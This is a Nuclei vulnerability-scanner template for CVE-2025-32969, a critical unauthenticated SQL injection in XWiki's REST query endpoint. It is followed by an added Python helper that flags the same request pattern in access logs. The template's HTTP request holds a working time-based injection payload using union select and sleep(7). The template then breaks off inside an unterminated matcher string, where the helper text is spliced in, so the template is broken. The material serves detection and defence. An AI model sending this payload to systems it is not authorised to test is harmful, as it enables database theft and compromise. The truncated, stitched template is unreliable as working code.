id: CVE-2025-32969

info:
  name: XWiki REST API Query - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    A SQL injection vulnerability exists in XWiki's REST API query endpoint. An unauthenticated attacker can execute arbitrary SQL queries through the 'q' parameter by manipulating the HQL query, potentially leading to data exfiltration or system compromise.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries through the REST API query endpoint, potentially leading to complete database compromise and data exfiltration.
  remediation: |
    Upgrade to the latest XWiki version that properly sanitizes HQL query parameters in the REST API.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-f69v-xrj8-rhxf
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32969
  classification:
    cve-id: CVE-2025-32969
    epss-score: 0.12804
    epss-percentile: 0.94147
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-89
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,sqli,rest-api,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        GET /rest/wikis/xwiki/query?q=where%20doc.name=length(%27a%27)*org.apache.logging.log4j.util.Chars.SPACE%20or%201%3C%3E%271%5C%27%27%20union%20select%201,2,3,sleep(7)%20%23%27&type=hql&distinct=0 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code==200'
          - 'contains_all(body, "WikiManager", "
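Added example for log review, not part of the Nuclei template or of XWiki itself: a Python helper that flags access-log requests to the REST query endpoint whose decoded q parameter carries the injection indicators present in the request above. The sample log lines are constructed, and the combined-format log regex is an assumption about the web server's log layout.

```python
"""Log-review helper for the CVE-2025-32969 request pattern (added example, not
part of the Nuclei template): flags /rest/wikis/<wiki>/query requests whose 'q'
parameter carries the injection indicators seen in the template's payload."""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Indicators from the template payload: UNION SELECT, time-based sleep(), an
# escaped quote (\'), the log4j class reference, and a trailing '#' comment.
# None of these belong in a legitimate HQL query on this endpoint.
INDICATORS = re.compile(r"(union\s+select|sleep\s*\(|\\'|org\.apache\.logging\.log4j|#)", re.I)
QUERY_PATH = re.compile(r"^/rest/wikis/[^/]+/query$")
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

def analyze_request(target: str) -> Optional[dict]:
    """Return a finding for a query-endpoint request whose decoded 'q' has indicators, else None."""
    parts = urlsplit(target)
    if not QUERY_PATH.match(parts.path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs percent-decodes once; decoding again also catches double-encoded
    # payloads (e.g. %2523 -> %23 -> #).
    q = unquote(params.get("q", [""])[0])
    hits = sorted({m.lower() for m in INDICATORS.findall(q)})
    if not hits:
        return None
    return {"path": parts.path, "type": params.get("type", [""])[0],
            "q": q, "indicators": hits}

def scan_log(lines) -> list:
    """Run analyze_request over access-log lines, attaching client IP and status."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, _method, target, status, _size = m.groups()
        finding = analyze_request(target)
        if finding:
            finding.update(ip=ip, time=ts, status=int(status))
            findings.append(finding)
    return findings

# Constructed sample log: the template's request followed by two benign ones.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2025:12:00:01 +0000] "GET /rest/wikis/xwiki/query?q=where%20doc.name=length(%27a%27)*org.apache.logging.log4j.util.Chars.SPACE%20or%201%3C%3E%271%5C%27%27%20union%20select%201,2,3,sleep(7)%20%23%27&type=hql&distinct=0 HTTP/1.1" 200 1532
198.51.100.4 - - [10/May/2025:12:00:05 +0000] "GET /rest/wikis/xwiki/query?q=where%20doc.space%3D%27Main%27&type=hql&number=10 HTTP/1.1" 200 2210
198.51.100.4 - - [10/May/2025:12:00:09 +0000] "GET /rest/wikis/xwiki/spaces/Main/pages HTTP/1.1" 200 4096
""".splitlines()
```

A hit on this pattern with a response time of several seconds and status 200 matches the template's own success criteria (duration>=7 and status_code==200), which is the signal to pull the database and application logs for that client.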